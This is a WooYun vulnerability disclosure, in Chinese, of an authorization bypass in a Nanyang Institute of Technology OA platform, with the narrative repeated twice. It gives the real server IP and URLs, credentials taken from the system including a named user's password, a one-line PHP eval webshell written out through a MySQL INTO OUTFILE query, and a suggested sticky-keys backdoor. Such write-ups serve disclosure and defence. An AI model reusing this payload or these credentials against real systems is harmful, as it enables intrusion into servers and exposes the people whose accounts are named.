当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169817

漏洞标题:南阳理工某平台权限绕过可浏览服务器可获得webshell

相关厂商:南阳理工学院

漏洞作者: myxf

提交时间:2016-01-14 14:05

修复时间:2016-01-19 14:10

公开时间:2016-01-19 14:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南阳理工某平台权限绕过可浏览服务器可获得webshell

详细说明:

官网:http://www.nyist.net/
看这里:

001.png


注意看链接:账号密码已经在链接里了,user pass2,登录oa系统
http://222.139.215.209/

002.png


网盘可浏览、管理服务器的全部文件,第一次见权限这么大的。。。
http://222.139.215.209/t9/core/funcs/netdisk/index.jsp?seqId=0&filePath=D:/&

003.png


005.png


这里列出的是目录,想要查看文件就要将seqId=0改成1

004.png


文件管理功能被隐藏了,去掉display:none就可以了
包括上传、下载、建立文件夹、删除、重命名、复制、粘贴都可以操作就是个微型的webshell啊

006.png


007.png


上传时不允许传jsp文件,其他的如php aspx都不支持,简单改成jpg传上去重命名不就可以了,可传了好几个版本都被杀了。。。,死活拿不到webshell,于是就浏览一下目录,找到了mysql的root账号

008.png


009.png


自带phpmyadmin
http://222.139.215.209:8080/phpMyAdmin/ 登录开外网链接

010.png


结果root账号也没提权成功,再翻目录就翻出了这个网站:http://222.139.215.209:8080/xiaowu
和oa系统并不是同一个Web服务器,试试能不能传马
翻数据库找到账号密码破解之:账号:崔冰然 密码:cbr201412

011.png


登录后台传个jpg的马

012.png


再使用oa系统重命名为php

013.png


结果还是被拦截了,白高兴

014.png


尝试了几次都不行,最终使用mysql成功导出webshell
select "<?php @eval($_POST['pass']);?>" into outfile 'D:/PHPnow-1.5.6/htdocs/diy.php';
http://222.139.215.209:8080/diy.php

015.png


cmd还是无法执行,也就没继续提服务器,到此为止

漏洞证明:

官网:http://www.nyist.net/
看这里:

001.png


注意看链接:账号密码已经在链接里了,user pass2,登录oa系统
http://222.139.215.209/

002.png


网盘可浏览、管理服务器的全部文件,第一次见权限这么大的。。。
http://222.139.215.209/t9/core/funcs/netdisk/index.jsp?seqId=0&filePath=D:/&

003.png


005.png


这里列出的是目录,想要查看文件就要将seqId=0改成1

004.png


文件管理功能被隐藏了,去掉display:none就可以了
包括上传、下载、建立文件夹、删除、重命名、复制、粘贴都可以操作就是个微型的webshell啊

006.png


007.png


上传时不允许传jsp文件,其他的如php aspx都不支持,简单改成jpg传上去重命名不就可以了,可传了好几个版本都被杀了。。。,死活拿不到webshell,于是就浏览一下目录,找到了mysql的root账号

008.png


009.png


自带phpmyadmin
http://222.139.215.209:8080/phpMyAdmin/ 登录开外网链接

010.png


结果root账号也没提权成功,再翻目录就翻出了这个网站:http://222.139.215.209:8080/xiaowu
和oa系统并不是同一个Web服务器,试试能不能传马
翻数据库找到账号密码破解之:账号:崔冰然 密码:cbr201412

011.png


登录后台传个jpg的马

012.png


再使用oa系统重命名为php

013.png


结果还是被拦截了,白高兴

014.png


尝试了几次都不行,最终使用mysql成功导出webshell
select "<?php @eval($_POST['pass']);?>" into outfile 'D:/PHPnow-1.5.6/htdocs/diy.php';
http://222.139.215.209:8080/diy.php

015.png


cmd还是无法执行,也就没继续提服务器,到此为止

修复方案:

你懂的
测试工具均已删除

版权声明:转载请注明来源 myxf@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-19 14:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-14 14:28 | myxf ( 实习白帽子 | Rank:61 漏洞数:13 | this myxf)

    然想起来可以替换文件,用五下shift后门,登录服务器